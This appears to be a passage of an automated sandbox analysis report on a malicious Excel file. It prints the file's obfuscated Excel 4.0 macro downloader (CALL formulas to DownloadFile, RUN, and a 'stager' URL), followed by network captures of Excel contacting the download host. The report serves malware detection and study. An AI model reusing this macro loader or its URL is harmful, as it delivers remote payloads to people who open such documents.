Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
Macro 4.0 Code |
---|
,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL('Doc2'!AA15&'Doc2'!AA16,'Doc2'!AB15&'Doc2'!AB16&'Doc2'!AB17,""JCJ"",'Doc2'!AD15,0)",,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL('Doc2'!AA19&'Doc2'!AA20,'Doc2'!AB19&'Doc2'!AB20&'Doc2'!AB21,""JCJ"",'Doc2'!AD15&'Doc2'!AD19,0)",,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL('Doc2'!AA23&'Doc2'!AA24,'Doc2'!AB23&'Doc2'!AB24&'Doc2'!AB25,""JJCCJJ"",0,A60,'Doc2'!AD15&'Doc2'!AD19&'Doc2'!AD23,0,0)",,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL(""INSENG"",""DownloadFile"",""BCCJ"",A60,'Doc2'!AD15&'Doc2'!AD19&'Doc2'!AD23,1)",,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL('Doc2'!AA27&'Doc2'!AA28,'Doc2'!AB27&'Doc2'!AB28&'Doc2'!AB29,""JJCCCCJJ"",0,'Doc2'!AD27,'Doc2'!AD15&'Doc2'!AD19&'Doc2'!AD23,,0,0)",,,,,,,,,,,,,,,,,,,,,,,,,,=RUN(Q1),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,http://jvdattorney.com/stager/babmboa.php,,,,,,,,,,,,,,,,,,,,,,,,,,
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 22, 2021 11:46:43.850178957 CET | 49716 | 80 | 192.168.2.3 | 162.241.225.18 |
Jan 22, 2021 11:46:44.018779039 CET | 80 | 49716 | 162.241.225.18 | 192.168.2.3 |
Jan 22, 2021 11:46:44.018928051 CET | 49716 | 80 | 192.168.2.3 | 162.241.225.18 |
Jan 22, 2021 11:46:44.020159960 CET | 49716 | 80 | 192.168.2.3 | 162.241.225.18 |
Jan 22, 2021 11:46:44.188584089 CET | 80 | 49716 | 162.241.225.18 | 192.168.2.3 |
Jan 22, 2021 11:46:44.451824903 CET | 80 | 49716 | 162.241.225.18 | 192.168.2.3 |
Jan 22, 2021 11:46:44.452049971 CET | 49716 | 80 | 192.168.2.3 | 162.241.225.18 |
Jan 22, 2021 11:46:44.491180897 CET | 49716 | 80 | 192.168.2.3 | 162.241.225.18 |
Jan 22, 2021 11:46:44.659750938 CET | 80 | 49716 | 162.241.225.18 | 192.168.2.3 |
Jan 22, 2021 11:46:44.969109058 CET | 80 | 49716 | 162.241.225.18 | 192.168.2.3 |
Jan 22, 2021 11:46:44.969269991 CET | 49716 | 80 | 192.168.2.3 | 162.241.225.18 |
Jan 22, 2021 11:46:49.969836950 CET | 80 | 49716 | 162.241.225.18 | 192.168.2.3 |
Jan 22, 2021 11:46:49.969914913 CET | 49716 | 80 | 192.168.2.3 | 162.241.225.18 |
Jan 22, 2021 11:47:19.969835043 CET | 80 | 49716 | 162.241.225.18 | 192.168.2.3 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 22, 2021 11:46:29.357741117 CET | 53 | 64185 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:46:30.250514030 CET | 65110 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:46:30.298774958 CET | 53 | 65110 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:46:31.352744102 CET | 58361 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:46:31.409552097 CET | 53 | 58361 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:46:32.573880911 CET | 63492 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:46:32.624667883 CET | 53 | 63492 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:46:33.970380068 CET | 60831 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:46:34.021138906 CET | 53 | 60831 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:46:39.761533022 CET | 60100 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:46:39.825978041 CET | 53 | 60100 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:46:40.712891102 CET | 53195 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:46:40.760795116 CET | 53 | 53195 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:46:41.132091999 CET | 50141 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:46:41.191463947 CET | 53 | 50141 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:46:42.138147116 CET | 50141 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:46:42.197272062 CET | 53 | 50141 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:46:43.152982950 CET | 50141 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:46:43.217340946 CET | 53 | 50141 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:46:43.706247091 CET | 53023 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:46:43.848256111 CET | 53 | 53023 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:46:43.938977003 CET | 49563 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:46:43.986840010 CET | 53 | 49563 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:46:45.145550013 CET | 51352 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:46:45.165976048 CET | 50141 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:46:45.193463087 CET | 53 | 51352 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:46:45.224885941 CET | 53 | 50141 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:46:46.391350031 CET | 59349 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:46:46.439323902 CET | 53 | 59349 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:46:47.502361059 CET | 57084 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:46:47.558892965 CET | 53 | 57084 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:46:48.693598032 CET | 58823 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:46:48.741473913 CET | 53 | 58823 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:46:49.181998968 CET | 50141 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:46:49.241058111 CET | 53 | 50141 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:46:50.143279076 CET | 57568 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:46:50.191530943 CET | 53 | 57568 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:46:51.619292021 CET | 50540 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:46:51.683568954 CET | 53 | 50540 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:46:57.840711117 CET | 54366 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:46:57.888685942 CET | 53 | 54366 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:47:02.693780899 CET | 53034 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:47:02.751976013 CET | 53 | 53034 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:47:08.629539013 CET | 57762 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:47:08.687330008 CET | 53 | 57762 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:47:18.617120028 CET | 55435 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:47:18.687684059 CET | 53 | 55435 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:47:34.433465958 CET | 50713 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:47:34.484159946 CET | 53 | 50713 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:47:37.654282093 CET | 56132 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:47:37.715204954 CET | 53 | 56132 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:48:09.310009003 CET | 58987 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:48:09.358670950 CET | 53 | 58987 | 8.8.8.8 | 192.168.2.3 |
Jan 22, 2021 11:48:10.839138031 CET | 56579 | 53 | 192.168.2.3 | 8.8.8.8 |
Jan 22, 2021 11:48:10.907335043 CET | 53 | 56579 | 8.8.8.8 | 192.168.2.3 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Jan 22, 2021 11:46:43.706247091 CET | 192.168.2.3 | 8.8.8.8 | 0x2a84 | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Jan 22, 2021 11:46:43.848256111 CET | 8.8.8.8 | 192.168.2.3 | 0x2a84 | No error (0) | 162.241.225.18 | A (IP address) | IN (0x0001) |
HTTP Request Dependency Graph |
---|
|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.3 | 49716 | 162.241.225.18 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jan 22, 2021 11:46:44.020159960 CET | 108 | OUT | |
Jan 22, 2021 11:46:44.451824903 CET | 113 | IN | |
Jan 22, 2021 11:46:44.491180897 CET | 113 | OUT | |
Jan 22, 2021 11:46:44.969109058 CET | 120 | IN |
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Click to jump to process
Memory Usage |
---|
Click to jump to process
High Level Behavior Distribution |
---|
back
Click to dive into process behavior distribution
System Behavior |
---|
General |
---|
Start time: | 11:46:39 |
Start date: | 22/01/2021 |
Path: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x3a0000 |
File size: | 27110184 bytes |
MD5 hash: | 5D6638F2C8F8571C593999C58866007E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|